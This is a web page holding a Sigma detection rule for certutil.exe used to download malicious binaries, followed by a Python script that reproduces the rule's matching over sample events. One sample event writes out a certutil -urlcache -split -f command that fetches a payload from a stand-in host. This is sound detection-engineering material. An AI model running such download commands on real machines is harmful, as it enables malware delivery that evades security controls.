CertUtil Downloading Malicious Binaries

Adversaries often bypass security controls by using the Windows Certificate Utility (certutil.exe) to download malicious code. In general, they leverage certutil.exe along with the -split command-line option. Part of the RedCanary 2024 Threat Detection Report.

Sigma rule

```yaml
title: CertUtil Downloading Malicious Binaries
id: 95d670e1-ce19-4269-b101-e12a1bce7c41
status: experimental
description: |
    Adversaries often bypass security controls by using the Windows Certificate
    Utility (certutil.exe) to download malicious code. In general, they leverage
    certutil.exe along with the -split command-line option. Part of the RedCanary
    2024 Threat Detection Report.
references:
    - https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/
author: RedCanary, Sigma formatting by Micah Babinski
date: 2024/03/21
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains|all:
            - 'urlcache'
            - 'split'
    condition: selection
falsepositives:
    - Unknown
level: low
```
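To see what the rule's `selection` block actually matches, here is an added example (not part of the original page, the Sigma project, or Red Canary's report) that re-implements the two conditions in plain Python and runs them over a handful of constructed process_creation events. It follows Sigma's default of case-insensitive string matching for `endswith` and `contains|all`; the hostnames, paths and URLs in the sample events are made up.

```python
"""Evaluate the CertUtil Sigma rule's selection logic against process_creation events.

Added example, not code from the original page or the Sigma project. It mirrors the
rule's selection (Image|endswith + CommandLine|contains|all) with Sigma's default
case-insensitive string matching; the event records below are constructed samples.
"""
from typing import Iterable

# Detection terms taken from the rule on this page.
IMAGE_SUFFIX = "\\certutil.exe"
REQUIRED_CMDLINE_TERMS = ("urlcache", "split")


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies the rule's `selection` block.

    Sigma string modifiers are case-insensitive by default, so both fields are
    lower-cased before comparison; `contains|all` requires every listed term.
    """
    image = str(event.get("Image", "")).lower()
    cmdline = str(event.get("CommandLine", "")).lower()
    if not image.endswith(IMAGE_SUFFIX.lower()):
        return False
    return all(term in cmdline for term in REQUIRED_CMDLINE_TERMS)


def find_matches(events: Iterable[dict]) -> list[dict]:
    """Filter a stream of process_creation events down to rule hits."""
    return [e for e in events if matches_rule(e)]


# Constructed sample events (hypothetical paths, URLs and parents).
SAMPLE_EVENTS = [
    {
        # Classic download pattern the rule is written for: matches.
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -urlcache -split -f http://example.invalid/payload.bin C:\\Users\\Public\\payload.bin",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
    },
    {
        # Same tool, different casing: Sigma matching is case-insensitive, so this still hits.
        "EventID": 1,
        "Image": "C:\\Windows\\SysWOW64\\CertUtil.EXE",
        "CommandLine": "CertUtil.EXE -URLCache -Split -f http://example.invalid/a.txt a.txt",
        "ParentImage": "C:\\Windows\\explorer.exe",
    },
    {
        # certutil fetching a CRL without -split: no match.
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -urlcache -f http://crl.example.invalid/root.crl root.crl",
        "ParentImage": "C:\\Windows\\System32\\svchost.exe",
    },
    {
        # Right keywords, wrong binary: the Image condition is not satisfied.
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -c \"echo urlcache split\"",
        "ParentImage": "C:\\Windows\\explorer.exe",
    },
]


if __name__ == "__main__":
    for hit in find_matches(SAMPLE_EVENTS):
        print(f"HIT  {hit['Image']}  <-  {hit['CommandLine']}")
```

The third sample event is the kind of benign certutil usage behind the rule's "Unknown" false-positive entry: `-urlcache` on its own is legitimate CRL or certificate retrieval, which is why the rule requires `split` as well. Real Sigma backends compile these modifiers into the target SIEM's query language; this script only reproduces the matching semantics so the logic can be checked offline.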
